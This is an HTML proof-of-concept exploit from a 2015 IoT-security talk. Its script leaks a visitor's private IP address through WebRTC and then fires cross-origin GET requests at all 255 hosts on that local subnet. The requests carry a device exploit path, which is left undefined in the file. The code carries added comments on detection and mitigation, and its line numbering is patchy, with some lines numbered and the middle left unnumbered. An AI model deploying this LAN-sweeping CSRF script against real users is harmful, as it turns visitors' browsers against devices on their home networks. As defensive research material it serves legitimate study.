1 | <HTML><TITLE>Smart CSRF PoC</TITLE> | |
2 | <!-- | |
3 | The MIT License (MIT) | |
4 | ||
5 | Copyright (c) 2015 Daniel Roesler | |
6 | ||
7 | Permission is hereby granted, free of charge, to any person obtaining a copy | |
8 | of this software and associated documentation files (the "Software"), to deal | |
9 | in the Software without restriction, including without limitation the rights | |
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
11 | copies of the Software, and to permit persons to whom the Software is | |
12 | furnished to do so, subject to the following conditions: | |
13 | ||
14 | The above copyright notice and this permission notice shall be included in all | |
15 | copies or substantial portions of the Software. | |
16 | ||
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR | |
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, | |
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE | |
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER | |
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, | |
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE | |
23 | SOFTWARE. | |
24 | --> | |
25 | <script> | |
26 | // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/ | |
27 | // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md | |
28 | // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request. | |
29 | // A version of this script including the payload for a 0-day in a home automation product was demonstrated at: | |
30 | // DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion' | |
31 | // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server. | |
32 | // -- Craig Young, Security Researcher Tripwire VERT | |
33 | ||
34 | //get the IP addresses associated with an account | |
/**
 * Enumerate the IPv4 addresses the browser exposes through WebRTC ICE
 * candidates (the well-known "WebRTC IP leak" PoC this file credits above).
 * Every distinct dotted-quad found in a candidate is passed to `callback`
 * exactly once; nothing is returned.
 *
 * Defender's note: the function depends on the browser emitting host
 * candidates that contain a literal private IP. Browsers that replace host
 * candidates with mDNS `.local` names, or that enforce a "disable non-proxied
 * UDP" WebRTC policy, yield no dotted-quads here (and, see handleCandidate,
 * the regex lookup then throws).
 *
 * @param {function(string): void} callback - receives each unique IP string
 */
function getIPs(callback){
    // addresses already reported, keyed by dotted-quad, so callback fires once per IP
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var useWebKit = !!window.webkitRTCPeerConnection;

    //bypass naive webrtc blocking using an iframe
    if(!RTCPeerConnection){
        //NOTE: you need to have an iframe in the page right above the script tag
        //
        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        //<script>...getIPs called in here...
        //
        // `iframe` is an undeclared identifier; it only resolves if the page
        // has an element with id="iframe" (the HTML on this page has none), so
        // on this page the branch would raise a ReferenceError rather than run.
        var win = iframe.contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
            || win.mozRTCPeerConnection
            || win.webkitRTCPeerConnection;
        useWebKit = !!win.webkitRTCPeerConnection;
    }

    //minimal requirements for data connection
    // NOTE(review): `optional: [{RtpDataChannels: true}]` is the legacy
    // constraint format; current browsers ignore or reject it — confirm.
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    // media.peerconnection.default_iceservers =
    // [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    // On WebKit-based browsers this produces an outbound STUN binding request
    // to stun.services.mozilla.com — an observable network artefact of the PoC.
    if(useWebKit)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    // Extract the first dotted-quad from one candidate string and report it
    // if not seen before. Invoked both from onicecandidate and from the SDP
    // re-scan in the setTimeout below.
    function handleCandidate(candidate){
        //match just the IP address
        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
        // exec() returns null when the candidate carries no IPv4 literal
        // (IPv6 or mDNS `.local` host candidates); indexing `[1]` on null then
        // throws a TypeError. This is why the PoC breaks on browsers that
        // obfuscate local candidates.
        var ip_addr = ip_regex.exec(candidate)[1];

        //remove duplicates
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);

        ip_dups[ip_addr] = true;
    }

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        // the final "gathering complete" event has candidate === null
        if(ice.candidate)
            handleCandidate(ice.candidate.candidate);
    };

    //create a bogus data channel
    // a data channel is needed so that the offer triggers ICE gathering at all
    pc.createDataChannel("");

    //create an offer sdp
    // legacy callback form of createOffer; both error callbacks are no-ops,
    // so a failed offer is silently ignored
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});

    }, function(){});

    //wait for a while to let everything done
    // Fixed 1 s wait, then re-parse the local SDP for "a=candidate:" lines in
    // case onicecandidate was not delivered. Candidates gathered after the
    // timeout are missed; if setLocalDescription has not completed by then,
    // pc.localDescription may still be null — presumably tolerated by the
    // author, verify in the target browser.
    setTimeout(function(){
        //read candidate info from local description
        var lines = pc.localDescription.sdp.split('\n');

        lines.forEach(function(line){
            if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
        });
    }, 1000);
}
117 | ||
// Entry point of the PoC: for each leaked private IPv4 address, issue one
// cross-origin GET to each of the 255 hosts (.1 .. .255) in the matched prefix.
// The responses are never read, so the Same-Origin Policy/CORS does not block
// the request from reaching the device; this is the CSRF half of the PoC
// (a state-changing GET on a LAN device).
//
// `exploit_URI_payload` is not defined anywhere on this page — it is the
// device-specific path that the author redacted, so as published this script
// throws a ReferenceError at the first loop iteration.
//
// Defender's view:
//  - Detection: ~255 GETs to consecutive RFC 1918 hosts from a single browser
//    tab within a few seconds (visible in device logs or LAN telemetry), often
//    preceded by the STUN request set up in getIPs.
//  - Device-side mitigation: do not mutate state on GET; require a CSRF token
//    and SameSite cookies.
//  - Browser-side mitigation: Chrome's Private Network Access restricts
//    public-origin pages from making requests to private-address targets.
getIPs(
    function(ip){
        // Three private-prefix shapes are recognised: 10.x.y., 192.168.x.
        // and the bare 172.16. prefix. The captured match text is used
        // verbatim as the host prefix below.
        var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
        if (local_regex.exec(ip) != null) {
            // e.g. "192.168.1." — for a 172.16.x.y address this is "172.16."
            // so the constructed host is "172.16.<n>", not a /24 derived from
            // the leaked address.
            var subnet = local_regex.exec(ip)[0];
            // `node` is assigned without var/let: an implicit global, and a
            // ReferenceError under strict mode.
            for (node=1; node<256; node++) {
                var url = 'http://' + subnet + node + exploit_URI_payload;
                // fire-and-forget: no load/error handler, async request
                var oReq = new XMLHttpRequest();
                oReq.open("get",url,true)
                oReq.send();
            }
        }
    }
);
132 | </script> | |
133 | <H1>o0o0o0o0o0o0</H1> | |
134 | </HTML> |